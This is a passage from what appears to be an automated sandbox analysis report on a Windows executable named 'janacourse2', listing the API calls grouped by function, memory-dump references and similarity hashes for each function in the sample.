                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 3172280962-24824748
                                                                                                            • Opcode ID: e7bde28adcad001acd342e17a103c57cb89411b11773b7e7e82c454766e1a104
                                                                                                            • Instruction ID: 93dd557dcb1f742013bcc0586aec151e040127b638a65a39983c50f9c78d6406
                                                                                                            • Opcode Fuzzy Hash: e7bde28adcad001acd342e17a103c57cb89411b11773b7e7e82c454766e1a104
                                                                                                            • Instruction Fuzzy Hash: 71D155746043119FC714DF19C884AAABBE5EF89710F14889DF8899B361DB35EC45CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 01010FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01010FCA
                                                                                                              • Part of subcall function 01010FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01010FD6
                                                                                                              • Part of subcall function 01010FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01010FE5
                                                                                                              • Part of subcall function 01010FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01010FEC
                                                                                                              • Part of subcall function 01010FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01011002
                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,01011335), ref: 010117AE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010117BA
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 010117C1
                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 010117DA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,01011335), ref: 010117EE
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 010117F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                            • String ID:
                                                                                                            • API String ID: 3008561057-0
                                                                                                            • Opcode ID: 505ebd46a3ac81d2c1094df4c501853f254396dcd108fa073fe145c629e4e85b
                                                                                                            • Instruction ID: aa345e6728056d9b2cd7123a568bffb3733f04037d4a36113f2b01fb5b3be9cb
                                                                                                            • Opcode Fuzzy Hash: 505ebd46a3ac81d2c1094df4c501853f254396dcd108fa073fe145c629e4e85b
                                                                                                            • Instruction Fuzzy Hash: A011A275502205FFEB249FA8CE49BAE7BF9FB42255F144098F6C197208C73A9940CB60
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010114FF
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 01011506
                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01011515
                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 01011520
                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101154F
                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 01011563
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                            • String ID:
                                                                                                            • API String ID: 1413079979-0
                                                                                                            • Opcode ID: b302b1ca2c4cd93e0424710398aa44e919689e7dc156040b65c8f421c08f0c5f
                                                                                                            • Instruction ID: 1a15e7f80468fcbf8ac8c6c088a18fe20af40e4002ffac4c167d785a33308818
                                                                                                            • Opcode Fuzzy Hash: b302b1ca2c4cd93e0424710398aa44e919689e7dc156040b65c8f421c08f0c5f
                                                                                                            • Instruction Fuzzy Hash: 9A112CB6601209EBEF21CFA8DE49BDE7BA9FF08744F044055FB45A2054C37A8E60DB61
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00FD3379,00FD2FE5), ref: 00FD3390
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD339E
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD33B7
                                                                                                            • SetLastError.KERNEL32(00000000,?,00FD3379,00FD2FE5), ref: 00FD3409
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 8813da73d9da57756babf923bb9d9462ce70132e270f61c26fbbf0fbcc3869ce
                                                                                                            • Instruction ID: 174d9ddd0234fca27e3897e3b66e442539ba6197ae004aa102e27f9df506b6d5
                                                                                                            • Opcode Fuzzy Hash: 8813da73d9da57756babf923bb9d9462ce70132e270f61c26fbbf0fbcc3869ce
                                                                                                            • Instruction Fuzzy Hash: 3801F533A093126FB62526746E89A1A3B56FB06375328022BF610903E0EF1A4E01B2C6
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00FE5686,00FF3CD6,?,00000000,?,00FE5B6A,?,?,?,?,?,00FDE6D1,?,01078A48), ref: 00FE2D78
                                                                                                            • _free.LIBCMT ref: 00FE2DAB
                                                                                                            • _free.LIBCMT ref: 00FE2DD3
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00FDE6D1,?,01078A48,00000010,00FB4F4A,?,?,00000000,00FF3CD6), ref: 00FE2DE0
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00FDE6D1,?,01078A48,00000010,00FB4F4A,?,?,00000000,00FF3CD6), ref: 00FE2DEC
                                                                                                            • _abort.LIBCMT ref: 00FE2DF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: 8a02f0934c56753df3f7f39f5339ce0780f099e14a0d8274187cce73deb7a089
                                                                                                            • Instruction ID: e99645a74080a6a6e190fca551bad5559383eea2a6b5515e6bc4e02f0d414449
                                                                                                            • Opcode Fuzzy Hash: 8a02f0934c56753df3f7f39f5339ce0780f099e14a0d8274187cce73deb7a089
                                                                                                            • Instruction Fuzzy Hash: 20F0F976D0668027D3B2363B7D0AA1E375DABC27B1F254019FA64D2186FE2D89017221
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                              • Part of subcall function 00FC9639: BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01048A4E
                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 01048A62
                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01048A70
                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 01048A80
                                                                                                            • EndPath.GDI32(?), ref: 01048A90
                                                                                                            • StrokePath.GDI32(?), ref: 01048AA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 43455801-0
                                                                                                            • Opcode ID: 1aa3b4483d193ee91d6fee2ac4f04574e830a6aeaebdb87cf77618abcfa068ee
                                                                                                            • Instruction ID: 93e5269070b3d82d80ca6253bc870abfa8e2369dec701576272025ac34674926
                                                                                                            • Opcode Fuzzy Hash: 1aa3b4483d193ee91d6fee2ac4f04574e830a6aeaebdb87cf77618abcfa068ee
                                                                                                            • Instruction Fuzzy Hash: 81115EB600010CBFEF119F94DD88E9A7F6CEF05350F008421FA85951A4C7769D55DF60
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 01015218
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 01015229
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01015230
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 01015238
                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0101524F
                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 01015261
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            • Opcode ID: eb059cddce645b2f41e6f468c402cc6ed2b7f9971f10920560e5c7e1c9c4c699
                                                                                                            • Instruction ID: a80d0096a62c31cd9b7954e5ad9a1070324a025935508507d071b3464639b84b
                                                                                                            • Opcode Fuzzy Hash: eb059cddce645b2f41e6f468c402cc6ed2b7f9971f10920560e5c7e1c9c4c699
                                                                                                            • Instruction Fuzzy Hash: A801A7B5E01705BBFB205BE59D49E5EBFB8EF49351F044065FE44AB284D6759800CFA0
                                                                                                            APIs
                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB1BF4
                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB1BFC
                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB1C07
                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB1C12
                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB1C1A
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB1C22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4278518827-0
                                                                                                            • Opcode ID: 578b1261ce220304694877e22799dfb5bc0d9da4e328a045ab74b14f51ecd6ff
                                                                                                            • Instruction ID: 2272fdebf43359370c8072c01ab4d0f2d8cac844c5f3c90b2e53d32a1043b4ec
                                                                                                            • Opcode Fuzzy Hash: 578b1261ce220304694877e22799dfb5bc0d9da4e328a045ab74b14f51ecd6ff
                                                                                                            • Instruction Fuzzy Hash: 8D0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CFE5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101EB30
                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0101EB46
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0101EB55
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB64
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB6E
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 839392675-0
                                                                                                            • Opcode ID: e0921b6fbd3a32bcc35182c02b767494189475d7ef986c16150ec2efb8623217
                                                                                                            • Instruction ID: 54b3398b20694808fd180e624d6d0e7418ec5152ab3c89de944359b957f90f0d
                                                                                                            • Opcode Fuzzy Hash: e0921b6fbd3a32bcc35182c02b767494189475d7ef986c16150ec2efb8623217
                                                                                                            • Instruction Fuzzy Hash: 62F06DB6242158BBE73156529E4DEAF3A7CEBCAB11F004158FA41D108496A92A0187B4
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?), ref: 01007452
                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 01007469
                                                                                                            • GetWindowDC.USER32(?), ref: 01007475
                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 01007484
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 01007496
                                                                                                            • GetSysColor.USER32(00000005), ref: 010074B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 272304278-0
                                                                                                            • Opcode ID: 3728a9a852bbfd06ed95014887cec8bff8e83b106d658c1bb48b279561232626
                                                                                                            • Instruction ID: 70dfdd7d178fadd8733f0b11e621297c3292ae9371b0e0ab26647cff6ad79d9c
                                                                                                            • Opcode Fuzzy Hash: 3728a9a852bbfd06ed95014887cec8bff8e83b106d658c1bb48b279561232626
                                                                                                            • Instruction Fuzzy Hash: 4B018B75401205EFEB625F64DE48BAE7BB5FF08311F514064F995A20E1CF3A2E41AB50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0101187F
                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0101188B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 01011894
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0101189C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 010118A5
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 010118AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 146765662-0
                                                                                                            • Opcode ID: 456ef1671819b7725fc980671c26c9ad5956c80169b735a8baaa0653172f8164
                                                                                                            • Instruction ID: 9d7674bb7d9cf0e70429098a6c9af42aaeccb68fef332e75f51d74f9491c8562
                                                                                                            • Opcode Fuzzy Hash: 456ef1671819b7725fc980671c26c9ad5956c80169b735a8baaa0653172f8164
                                                                                                            • Instruction Fuzzy Hash: CAE0EDBA105501BBE7215FA1EF4C905BF39FF4A7227108220F26581078CB375420DB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101C6EE
                                                                                                            • _wcslen.LIBCMT ref: 0101C735
                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101C79C
                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0101C7CA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                            • Opcode ID: 254c4ec7d1438df2203bd911a1f9285d5b2b8815bb77bc3fb40f816a8cd42603
                                                                                                            • Instruction ID: a31b8985ee6d757295bc0be144158d90798f4a70635af5f38a5773b8632b2c1e
                                                                                                            • Opcode Fuzzy Hash: 254c4ec7d1438df2203bd911a1f9285d5b2b8815bb77bc3fb40f816a8cd42603
                                                                                                            • Instruction Fuzzy Hash: 6851E2716843019BF7919E28CA85B6EBBE4BF49310F04096DFAD6D2195DBBCD804CB52
                                                                                                            APIs
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0103AEA3
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 0103AF38
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103AF67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                            • String ID: <$@
                                                                                                            • API String ID: 146682121-1426351568
                                                                                                            • Opcode ID: 32bfbfe60d05f2561ae18222cec652b3f6e3343462913fd0a274601e60e70d19
                                                                                                            • Instruction ID: ced488e218bc70876247ea3c5bf38dc06c70f72b7882175a85531e67d09f8734
                                                                                                            • Opcode Fuzzy Hash: 32bfbfe60d05f2561ae18222cec652b3f6e3343462913fd0a274601e60e70d19
                                                                                                            • Instruction Fuzzy Hash: D5717A74A00215DFCB14EF55C885A9EBBF4BF48310F048499E896AB392C779ED45CFA0
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01017206
                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0101723C
                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0101724D
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 010172CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 753597075-1075368562
                                                                                                            • Opcode ID: ad81f5ea9dd597a907e9ddf3546187038a7a7bc74279a95bced8f9f648879653
                                                                                                            • Instruction ID: 9e125bda13854c1605e3fbdd0de7fe3ce8d33b9ab72eec68f781f84a366ac8c7
                                                                                                            • Opcode Fuzzy Hash: ad81f5ea9dd597a907e9ddf3546187038a7a7bc74279a95bced8f9f648879653
